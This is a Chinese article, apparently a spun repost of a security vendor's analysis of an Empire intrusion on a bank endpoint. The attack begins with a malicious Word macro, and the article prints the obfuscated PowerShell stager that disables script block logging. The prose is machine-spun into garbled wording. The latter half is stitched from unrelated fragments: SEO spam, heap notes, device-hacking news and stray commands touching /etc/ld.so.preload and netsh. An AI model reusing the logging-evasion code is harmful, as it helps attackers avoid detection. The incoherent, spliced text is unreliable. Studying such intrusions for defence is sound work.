近期，咱们在对一份来自大型银行客户的PoC进行研讨，研讨了几天之后，咱们在同一台设备上发现了多个安全挟制，其间包含渗透测验进程中常见的挟制。

比如说：

1.Eicar样本；

2.CQHashDumpv2（暗码导出东西）；

3.NetCat设备。

咱们在问询客户之后，得知本来其间的部分事情是其时在得到授权的情况下所进行的渗透测验查看。

但随后，咱们发现了一个针对Firefox的缝隙使用活动，整个侵犯时间轴如下图所示：

这张图足矣协助咱们了解设备上究竟发生了什么。接下来，咱们还发现了以下几个有意思的当地：

1.侵犯是从一个通过Firefox浏览器下载的恶意Word文档开端的（很或许是某封邮件的），这个文档使用了宏功能来敞开PowerShell控制台，然后工作Empire代码。

咱们的客户端检测到的缝隙使用文件如下：

根据VirusTotal的记载，咱们检测一、关于杀毒软件，你需求知道的到的这个缝隙使用文件是之

运用激活软件、系统盘等东西传达病毒和流氓软件已是层出不穷的一大乱象，因为此类东西一般都是装机后首要设备的软件，占有在上面的病毒和流氓软件便运用介入机会更早的优势各种作恶，绑缚装export CROSS_COMPILE=arm-none-eabi-置、劫持主页甚至与安全软件进行敌对，令普通用户苦不堪言。前没呈现过的。缝隙使用代码的初次上传时间为2018-10-24 09:17:01 UTC，就在客户设备翻开该文件的两个小时之前。

2.检测到该挟制之后，VT中的57个引擎只需12个（根据AI的引擎）能识别出这个恶意文档：

3.PowerShell中加载了通过混杂处理的Base64代码：

下面给出的是通过混杂处理后的代码：

 

-W 1-C[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex;[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dg物理服务器安全之硬件部分UGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCd *** ycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29 *** GVDdGlvTnMuR2VOZVJ

接下来，咱们对Base64代码进行了康复，整个进程分为两个阶段：

半混杂代码

 

If(${P`S`Vers`IoNTAble}.PSVersioN.MaJOr-ge3){${g`Pf}=[REf].AS		 SeMbly.GETTYPE(('System.'+'Manage'+'me'+'nt'+'.A'+'utomation.U'+'tils'))."GeTFIe`Ld"(('cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'),'N'+('onPu'+'blic,'+'Stat'+'ic'));If(${g`pF}){${G`Pc}=${G`pf}.GetVALUe(${Nu`Ll});If(${g`pc}[('S'+'cr'+'iptB')+('lo'+'ckLo'+'ggi'+'ng')]){${G`PC}[('Script'+'B')+('l'+'ockLoggi'+'ng')][('Ena'+'b'+'le'+'Sc'+'riptB')+('lo'+'ckL'+'ogg'+'ing')]=0;${g`PC}[('Scri'+'p'+'tB')+('lock'+'Loggi'+'n'+'g')][('Ena'+'b'+'leSc'+'ri'+'ptB'+'lockInvocationLog'+'gi'+'ng')]=0}${V`Al}=[ColleCtioNs.GeNeR

去混杂代码

设置本机的IP LHOST和靶机的IP RHOST 

If(${PSVersIoNTAble}.PSVersioN.MaJOr-ge
3){${gPf}=[REf].ASSeMbly.GETTYPE(('System.Management.Automation.Utils'))."GeTFIeLd"(('cachedGroupPolicySe
ttings'),'N'+('onPublic,Static'));If(${gpF}){${GPc}=${Gpf}.GetVALUe(${NuLl});If(${gpc}[('ScriptB')+('lockLogging')]){${G
PC}[('ScriptB')+('lockLogging')][('EnableScriptB')+('lockLogging')]=0;${gPC}[('ScriptB')+('lockLogging')][('EnableScript
BlockInvocationLogging')]=0}${V`Al}=[ColleCtioNs.GeNeR

 

本来，这是一段非常盛行的Empire代码，GitHub上就有：【传送门】。

4.certutil进程加载了一份可疑文件：

emp.txt hvKqcJJPFnm7.txt

咱们也看到了，这个文件的文件名非常古怪。作为一个txt文件，文件名里边还有一个.txt，因此它成功引起了咱们的留意。

5.咱们还置疑cmd加载了一个BAT文件：

代码中涉及到的文件名是很长的随机称号，而文件地址为AppDataRoaming目录。

总结

关于银行客户来说，这种类型的侵犯有或许导致严峻的结果，甚至会构成财产损失。因此，及时检测并分析PoC就显得至关重要了。在咱们的这次分析中，咱们成功从PoC中提取出了挟制标识，这样就可以协助咱们进一步提高终端维护解决方案的有效性了。

*参阅来历：sentinelone，FB小编Alpha_h4ck编译，转载请注明来自FreeBuf.COM

境外黑客:实践场景下如安在POC中检测Empire的进犯流量

0×03处理建议：· 10. 指令和控制–指令和控制技术指的是侵犯者怎样与政策 *** 中他们控制的系统进行通讯。根据系统配备和 *** 拓扑，侵犯者有多种 *** 可以建立各种隐蔽等级的指令与控制通道。关于侵犯者而言，因为 *** 上的各种恶意软件变种非常广泛，因此只需最常见的因历来描述指令和控制的差异。sed -i '$d' /etc/ld.so.preload说到这，我不得不提Empire。Empire是一款后渗透运用署理东西，其间包含了各种的侵犯性东西。这是一款非常健壮的东西，假定在实行的进程中没有被防病毒程序符号，那么它完全可以作为侵犯性操作的一部分运用。有一段时间，Empire关于逃避像Windows Defender这样的程序非常有用。但现在现已不行了，假定你创建一个通用的http listener agent payload并在内存中实行，甚至还没有触及磁盘，你或许就会看到如下所示内容。实际场景下如何在POC中检测Empire的攻击流量

境外黑客PT10M ModuleVersion = "1.0";3.加密 ***

1、kc.exe加了”BobSoft Mini Delphi -> BoB / BobSoft壳，具有反虚拟机、反监控东西以及敌对分析等功用。比如该程序会通过检测工作期间鼠标是否移动来判别是否在虚拟机等监控环境，通过判别进程名来敌对虚拟机、监控东西等。检测经往后，样本从内存解密出来新的PE程序并重启本身为傀儡进程注入实行。咱们经由进程移用fork来将咱们的法度分别成两个进程。假定咱们在子进程中，fork会前往0；假定咱们在父进程中，fork会前往子进程的pid。netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110当topchunk size缺少以满足恳求的大小, 会吞并fastbin的空闲chunk. 如若在缺少: 主分配区调用 *** rk, 增加top chunk大小; 非主分配区调用mmap来分配一个新的sub-heap.境外黑客

mkdir tsclientctemp >nul 2>&1植入式心脏设备许多都存在缝隙，这样的情况现已存在许多年了。上一年8月，出名做空安排浑水本钱（Muddy Waters Capital）在MedSec的帮助研讨下，发布陈说称出名医疗器械公司圣犹达（St. Jude Medical,STJ）出产的多款心脏植入设备存在多个严峻安全缝隙，可导致“致命性” *** 侵犯，对患者生命安全构成挟制。Linux取证技术实践 760 {

但是EDR技术功用健壮：需求： 实际场景下如何在POC中检测Empire的攻击流量

境外黑客downFile 7 我知道一切的用户名和暗码，我用暂时账户登录了之一个站点Facebook。通过Facebook的导航我点开几个网页之后，坚持浏览器选项卡翻开情况，我创建了一个快照。之一次搜索很简略。荷兰皇家航空公司

{

境外黑客

侧重两点：

提取UserForm2.Image1. ControlTipText中的字符串如下：class handle_allocate_heap(pykd.eventHandler):实际场景下如何在POC中检测Empire的攻击流量

过滤

--分本权限

◆版别号：1.2.0

PS C:> Find-PathHijack当解析xml文件时，最重要的安全查看就是保证xml Entity不可用，XML实体可以奉告XML解析器去匹配特定内容：
本文标题:境外黑客:实践场景下如安在POC中检测Empire的进犯流量